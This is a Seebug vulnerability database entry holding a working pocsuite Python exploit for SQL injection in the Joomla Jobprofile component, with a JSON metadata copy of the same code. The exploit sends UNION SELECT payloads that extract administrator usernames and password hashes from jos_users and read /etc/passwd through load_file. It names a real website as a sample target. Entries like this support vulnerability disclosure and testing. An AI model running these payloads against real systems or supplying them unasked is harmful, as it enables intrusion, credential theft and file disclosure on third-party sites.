ID SSV:72384
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
vulID = '72384' # ssvid
version = '1.0'
author = ['kikay']
vulDate = '2011-12-02'
createDate = '2016-01-22'
updateDate = '2016-01-22'
references = ['http://www.seebug.org/vuldb/ssvid-72384']
name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'
appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'
appName = 'Joomla Jobprofile Component'
appVersion = 'N/A'
vulType = 'SQL Injection'
desc = '''
Joomla Jobprofile 组件 index.php 的参数id由于过滤不严,导致出现SQL注入漏洞。
远程攻击者可以利用该漏洞执行SQL指令。
利用该漏洞计算md5(1)的POC格式如下:
http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview
&id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--
下面的将分别利用注入漏洞读取joomla管理员口令密码,以及读取/etc/passwd文件的内容。
'''
samples = ['http://www.astellas.cz']
def _attack(self):
#利用SQL注入读取joomla管理员信息
result = {}
#访问的地址
exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
#利用Union方式读取信息
payload="-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"\
",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--"
#构造漏洞利用连接
vulurl=self.url+exploit+payload
#自定义的HTTP头
httphead = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
#提取信息的正则表达式
parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
#发送请求
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#检查是否含有特征字符串
if '$~~~$' in resp.content:
#提取信息
match=re.search(parttern,resp.content,re.M|re.I)
if match:
#漏洞利用成功
result['AdminInfo']={}
#用户名
result['AdminInfo']['Username']=match.group(1)
#密码
result['AdminInfo']['Password']=match.group(2)
return self.parse_output(result)
def _verify(self):
#利用注入漏洞读取/etc/passwd的文件内容
result = {}
#文件名称
filename='/etc/passwd'
#进行16进制编码
hexfilename='0x'+filename.encode('hex')
#访问的地址
exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
#利用Union方式读取信息
payload="-1+union+all+select+1,load_file("+hexfilename+"),3,4,5,6,7,8,9+from+jos_users--"
#构造漏洞利用连接
vulurl=self.url+exploit+payload
#自定义的HTTP头
httphead = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive'
}
#发送请求
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#判断返回结果
if resp.status_code==200:
match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)
#读取文件成功
if match:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url+exploit
result['VerifyInfo']['Payload'] = payload
#记录文件内容
result['Fileinfo']={}
result['Fileinfo']['Filename']=filename
result['Fileinfo']['Content']=match.group(0)+'...'
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
{"lastseen": "2017-11-19T16:28:40", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "poc", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-11-19T16:28:40"}, "dependencies": {"references": [], "modified": "2017-11-19T16:28:40"}, "vulnersScore": 0.4}, "href": "https://www.seebug.org/vuldb/ssvid-72384", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:72384", "title": "Joomla Jobprofile Component (com_jobprofile) - SQL Injection", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport re\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '72384' # ssvid\r\n version = '1.0'\r\n author = ['kikay']\r\n vulDate = '2011-12-02'\r\n createDate = '2016-01-22'\r\n updateDate = '2016-01-22'\r\n references = ['http://www.seebug.org/vuldb/ssvid-72384']\r\n name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'\r\n appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'\r\n appName = 'Joomla Jobprofile Component'\r\n appVersion = 'N/A'\r\n vulType = 'SQL Injection'\r\n desc = '''\r\n Joomla Jobprofile \u7ec4\u4ef6 index.php \u7684\u53c2\u6570id\u7531\u4e8e\u8fc7\u6ee4\u4e0d\u4e25\uff0c\u5bfc\u81f4\u51fa\u73b0SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\r\n \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884cSQL\u6307\u4ee4\u3002\r\n\r\n \u5229\u7528\u8be5\u6f0f\u6d1e\u8ba1\u7b97md5(1)\u7684POC\u683c\u5f0f\u5982\u4e0b\uff1a\r\n\r\n http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview\r\n &id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--\r\n\r\n \u4e0b\u9762\u7684\u5c06\u5206\u522b\u5229\u7528\u6ce8\u5165\u6f0f\u6d1e\u8bfb\u53d6joomla\u7ba1\u7406\u5458\u53e3\u4ee4\u5bc6\u7801\uff0c\u4ee5\u53ca\u8bfb\u53d6/etc/passwd\u6587\u4ef6\u7684\u5185\u5bb9\u3002\r\n '''\r\n samples = ['http://www.astellas.cz']\r\n\r\n def _attack(self):\r\n #\u5229\u7528SQL\u6ce8\u5165\u8bfb\u53d6joomla\u7ba1\u7406\u5458\u4fe1\u606f\r\n result = {}\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='\r\n #\u5229\u7528Union\u65b9\u5f0f\u8bfb\u53d6\u4fe1\u606f\r\n payload=\"-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password\"\\\r\n \",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u63d0\u53d6\u4fe1\u606f\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\r\n parttern='\\$~~~\\$(.*)\\*\\*\\*(.*)\\$~~~\\$'\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u68c0\u67e5\u662f\u5426\u542b\u6709\u7279\u5f81\u5b57\u7b26\u4e32\r\n if '$~~~$' in resp.content:\r\n #\u63d0\u53d6\u4fe1\u606f\r\n match=re.search(parttern,resp.content,re.M|re.I)\r\n if match:\r\n #\u6f0f\u6d1e\u5229\u7528\u6210\u529f\r\n result['AdminInfo']={}\r\n #\u7528\u6237\u540d\r\n result['AdminInfo']['Username']=match.group(1)\r\n #\u5bc6\u7801\r\n result['AdminInfo']['Password']=match.group(2)\r\n return self.parse_output(result)\r\n\r\n def _verify(self):\r\n #\u5229\u7528\u6ce8\u5165\u6f0f\u6d1e\u8bfb\u53d6/etc/passwd\u7684\u6587\u4ef6\u5185\u5bb9\r\n result = {}\r\n #\u6587\u4ef6\u540d\u79f0\r\n filename='/etc/passwd'\r\n #\u8fdb\u884c16\u8fdb\u5236\u7f16\u7801\r\n hexfilename='0x'+filename.encode('hex')\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='\r\n #\u5229\u7528Union\u65b9\u5f0f\u8bfb\u53d6\u4fe1\u606f\r\n payload=\"-1+union+all+select+1,load_file(\"+hexfilename+\"),3,4,5,6,7,8,9+from+jos_users--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u5224\u65ad\u8fd4\u56de\u7ed3\u679c\r\n if resp.status_code==200:\r\n match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)\r\n #\u8bfb\u53d6\u6587\u4ef6\u6210\u529f\r\n if match:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = self.url+exploit\r\n result['VerifyInfo']['Payload'] = payload\r\n #\u8bb0\u5f55\u6587\u4ef6\u5185\u5bb9\r\n result['Fileinfo']={}\r\n result['Fileinfo']['Filename']=filename\r\n result['Fileinfo']['Content']=match.group(0)+'...'\r\n return self.parse_output(result)\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\nregister(TestPOC)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72384", "type": "seebug", "objectVersion": "1.4"}
{}